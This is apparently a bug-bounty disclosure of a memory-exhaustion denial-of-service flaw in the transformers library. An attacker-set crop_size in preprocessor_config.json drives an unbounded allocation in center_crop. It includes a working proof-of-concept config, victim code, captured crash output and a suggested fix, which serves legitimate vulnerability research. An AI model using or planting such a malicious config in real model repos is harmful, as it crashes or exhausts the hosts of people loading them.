YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
Unbounded memory allocation (DoS) via attacker-controlled crop_size in preprocessor_config.json reaching center_crop pad-branch through AutoImageProcessor.from_pretrained
Target: huggingface/transformers β version 5.14.1 (verified: torch 2.13.0+cpu, torchvision 0.28.0+cpu, numpy 2.5.1, Python 3.13)
Class: Denial of Service (unbounded size β allocation), CWE-789 (Memory Allocation with Excessive Size Value) / CWE-1284 (Improper Validation of Specified Quantity in Input)
Entry point: AutoImageProcessor.from_pretrained(<local model dir>) + one ordinary preprocess call. No trust_remote_code, no network.
Summary
The image-processor crop_size is read verbatim from a model repo's preprocessor_config.json and passed through get_size_dict / SizeDict with no upper-bound validation. During preprocess, when crop_size exceeds the input image dimensions, center_crop takes its padding branch and materializes an output tensor of shape (N, C, crop_height, crop_width). Because crop_height/crop_width are unbounded attacker integers from a few bytes of JSON, this forces an arbitrarily large O(crop_h * crop_w) allocation β quadratic in the attacker's integer β reaching OOM-kill of the host or a deterministic overflow crash.
This is the normal, unavoidable use of a loaded image processor: load a model repo, preprocess any image.
Root cause
crop_size flows from the untrusted JSON into get_size_dict with no cap:
src/transformers/image_processing_utils.py β get_size_dict (around line 583) and SizeDict construction (lines 332-333): the crop dict is accepted verbatim, no maximum enforced.
During preprocess, do_center_crop=true routes into the backend center_crop, whose padding branch allocates a tensor sized directly by crop_size:
src/transformers/image_processing_backends.py β TorchvisionBackend.center_crop (lines 352-378):
# when crop dims exceed image dims, pad instead of crop:
padding_ltrb = [...] # computed from (crop - orig)
image = tvF.pad(image, padding_ltrb, fill=0) # allocates (N, C, crop_h, crop_w)
src/transformers/image_transforms.py β center_crop (line 509), PIL/numpy backend:
new_height = max(crop_height, orig_height)
new_width = max(crop_width, orig_width)
new_shape = image.shape[:-2] + (new_height, new_width)
new_image = np.zeros_like(image, shape=new_shape) # allocates crop_h * crop_w
There is no cap on crop_height / crop_width, so a few-byte JSON integer forces an arbitrarily large allocation. The input image size is irrelevant to the attacker β a tiny 64Γ64 image still triggers full allocation of the attacker-chosen output shape.
PoC
Attacker publishes a model repo containing only a preprocessor_config.json:
ip_evil/preprocessor_config.json:
{
"image_processor_type": "CLIPImageProcessor",
"do_resize": false,
"do_center_crop": true,
"crop_size": {"height": 2000000000, "width": 2000000000},
"do_rescale": false,
"do_normalize": false
}
Victim code (ordinary usage, no trust_remote_code, no network):
import numpy as np
from transformers import AutoImageProcessor
img = (np.random.rand(64, 64, 3) * 255).astype(np.uint8) # tiny 64x64 input
ip = AutoImageProcessor.from_pretrained("ip_evil")
ip(img, return_tensors="np") # forces (1,3,2e9,2e9) allocation
Victim environment is the realistic one: torch + torchvision are hard-required by AutoImageProcessor in transformers v5; the same bug also exists in the PIL/numpy backend via np.zeros_like.
Captured evidence (real execution, transformers 5.14.1)
=== NEGATIVE CONTROL (crop 224) ===
loaded: CLIPImageProcessor crop_size= SizeDict(height=224, width=224, ...)
OK output pixel_values shape: (1, 3, 224, 224)
=== MID-SIZE (crop 25000 x 25000, input 64x64) ===
loaded crop_size: 25000 25000
output shape: (1, 3, 25000, 25000) nbytes(GB): 1.875
baseline RSS MB: 399 peak RSS MB: 3988 time: 8.5s
=== EXTREME (crop 2000000000 x 2000000000, input 64x64) ===
loaded: CLIPImageProcessor crop_size= SizeDict(height=2000000000, width=2000000000, ...)
CRASH: RuntimeError -> Storage size calculation overflowed with sizes=[1, 3, 2000000000, 2000000000]
- Negative control (
crop_size {height:224,width:224}, identical repo otherwise): loadsCLIPImageProcessor, returnspixel_valuesshape(1,3,224,224), no crash, trivial memory. - Mid-size amplification (
crop_size 25000Γ25000, same 64Γ64 input): output(1,3,25000,25000)= 1.875 GB; process peak RSS rose from 399 MB baseline to 3988 MB (~3.6 GB real committed memory), 8.5 s CPU. Genuine resource exhaustion, quadratic in the attacker'scrop_sizeinteger. Scalingcrop_sizelinearly scales committed memory quadratically to OOM-kill the host. - Extreme value (
crop_size 2e9Γ2e9): deterministic immediate crash instead of silent OOM.
PoC repos (each a single preprocessor_config.json): ip_evil (malicious 2e9), ip_mid (25000 amplification), ip_good (224 negative control).
Impact
A malicious model repo (or any tampered preprocessor_config.json) causes a victim that merely loads the processor and preprocesses any image to allocate arbitrarily large memory β quadratic in a few-byte attacker integer β leading to OOM-kill / host DoS, or a deterministic overflow crash at extreme values. No trust_remote_code, no code execution primitive, no network required; triggered by the unavoidable normal use of a loaded image processor.
Suggested fix
Enforce an upper bound on crop_size (and size) in get_size_dict / SizeDict construction, and/or cap the padding-branch output dimensions in center_crop relative to a sane maximum, rejecting configs whose crop dimensions vastly exceed the input image or an absolute ceiling.
Dedup note
Distinct from all prior covered transformers findings and existing EnigmaConsultant/huntr-poc-transformers-* repos:
- gguf DoS β different format/parser.
- weight_map path traversal β different file/mechanism.
- config-integer-alloc DoS β that is
config.jsonvocab_size/hidden_sizedriving model weight allocation viaAutoModel.from_config. This finding ispreprocessor_config.jsoncrop_sizedriving an image preprocess allocation viaAutoImageProcessor+preprocess. - generate-merges quadratic DoS β different tokenizer path.
- WhisperFeatureExtractor mel_filter_bank OOM (
feature_size/n_fft) β explicitly NOT this path; that is the audio feature-extractormel_filter_bank, different file, different config, different field, different API.
Separate file (image_processing_backends.py / image_transforms.py), separate config (preprocessor_config.json), separate field (crop_size), separate API (AutoImageProcessor + preprocess). Same defensive class (unbounded size β alloc) as config-integer-alloc but a genuinely different reachable sink. No prior public CVE known for this specific crop_size center_crop pad-branch sink.